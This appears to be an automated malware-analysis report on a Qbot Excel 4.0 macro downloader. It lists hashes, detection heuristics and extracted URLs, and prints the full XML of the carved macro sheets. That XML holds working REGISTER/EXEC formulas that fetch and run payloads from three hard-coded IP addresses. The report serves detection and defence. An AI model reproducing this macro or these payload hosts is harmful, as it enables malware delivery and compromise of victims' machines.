Qbot Office (OOXML) malware analysis — malicious · b4b15ddbcfe9b4ac

MALICIOUS

Office (OOXML)

150.1 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-07-02

MD5: 4e8c9b8b88d0f4aa6bb07dc843c334bb SHA-1: 45a26d2cceb793c6324e7a063757984d2442bde5 SHA-256: b4b15ddbcfe9b4ac7ea95e46ffb74b4ed7adb05b44f04d10d04318319f66d84f

250 Risk Score

Malware Insights

Qbot · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

This Excel file contains Excel 4.0 macros that utilize dangerous functions like REGISTER and EXEC. The macros attempt to download a file from 'http://185.240.103.219/' and execute it using 'regsvr32 ..\Kro.fis'. This behavior is consistent with Qbot malware, which often uses macro-enabled documents to download and execute its payload.

Heuristics 6

ClamAV: Xls.Downloader.Qbot06210-9875009-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Downloader.Qbot06210-9875009-0
Excel 4.0 macro sheet (2 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET

Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME

Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
Dangerous XLM formula APIs: REGISTER, RUN, EXEC, HALT critical OOXML_XLM_DANGEROUS_FN

Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET

Excel workbook contains 3 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://185.240.103.219/ In document text (OOXML body / shared strings)
- http://190.14.37.3/In document text (OOXML body / shared strings)
- http://185.183.99.120/In document text (OOXML body / shared strings)
- http://www.iec.chIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/spreadsheetml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`xlm_sheet_00.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet1.xml	2446 bytes
SHA-256: `c2e527cd52b125c07092c59d33090fc3ad9446b4f94b7ce503dfd27afbab14e6`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{1F6988B8-EA22-44CB-B340-DE917F2EE874}"><dimension ref="F8:H25"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="5" width="9.140625" style="1"/><col min="6" max="6" width="27.5703125" style="1" customWidth="1"/><col min="7" max="7" width="36.7109375" style="1" customWidth="1"/><col min="8" max="16384" width="9.140625" style="1"/></cols><sheetData><row r="8" spans="6:8" x14ac:dyDescent="0.25"><c r="G8" s="1" t="str"><f>NOW()&H8</f><v>44372,548321875</v></c><c r="H8" s="1" t="s"><v>3</v></c></row><row r="12" spans="6:8" x14ac:dyDescent="0.25"><c r="G12" s="1" t="b"><f>REGISTER(Sheet2!O12,Sheet2!O13,Sheet2!O14,Sheet2!O15,,1,9)</f><v>0</v></c></row><row r="13" spans="6:8" x14ac:dyDescent="0.25"><c r="F13" s="1" t="str"><f>"http://185.240.103.219/"</f><v>http://185.240.103.219/</v></c><c r="G13" s="1" t="e"><f>Jerutyg(0,F13&G8,"..\Kro.fis",0,0)</f><v>#NAME?</v></c></row><row r="14" spans="6:8" x14ac:dyDescent="0.25"><c r="F14" s="1" t="str"><f>"http://190.14.37.3/"</f><v>http://190.14.37.3/</v></c><c r="G14" s="1" t="e"><f>Jerutyg(0,F14&G8,"..\Kro.fis1",0,0)</f><v>#NAME?</v></c></row><row r="15" spans="6:8" x14ac:dyDescent="0.25"><c r="F15" s="1" t="str"><f>"http://185.183.99.120/"</f><v>http://185.183.99.120/</v></c><c r="G15" s="1" t="e"><f>Jerutyg(0,F15&G8,"..\Kro.fis2",0,0)</f><v>#NAME?</v></c></row><row r="25" spans="7:7" x14ac:dyDescent="0.25"><c r="G25" s="1" t="b"><f>RUN(Sheet4!I9)</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
`xlm_sheet_01.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet2.xml	1747 bytes
SHA-256: `38e9b51fd3cb35b28d5fe40b15ffb8f20ea947b6b435c697e9aa5042231a0b8a`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{348FF88C-42DC-4DD2-8614-4EF4426F94E1}"><dimension ref="I16:I23"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="8" width="9.140625" style="1"/><col min="9" max="9" width="14.5703125" style="1" bestFit="1" customWidth="1"/><col min="10" max="16384" width="9.140625" style="1"/></cols><sheetData><row r="16" spans="9:9" x14ac:dyDescent="0.25"><c r="I16" s="1" t="b"><f>EXEC(Sheet2!O22)</f><v>0</v></c></row><row r="17" spans="9:9" x14ac:dyDescent="0.25"><c r="I17" s="1" t="b"><f>EXEC(Sheet2!O22&"1")</f><v>0</v></c></row><row r="18" spans="9:9" x14ac:dyDescent="0.25"><c r="I18" s="1" t="b"><f>EXEC(Sheet2!O22&"2")</f><v>0</v></c></row><row r="23" spans="9:9" x14ac:dyDescent="0.25"><c r="I23" s="1" t="b"><f>HALT()</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.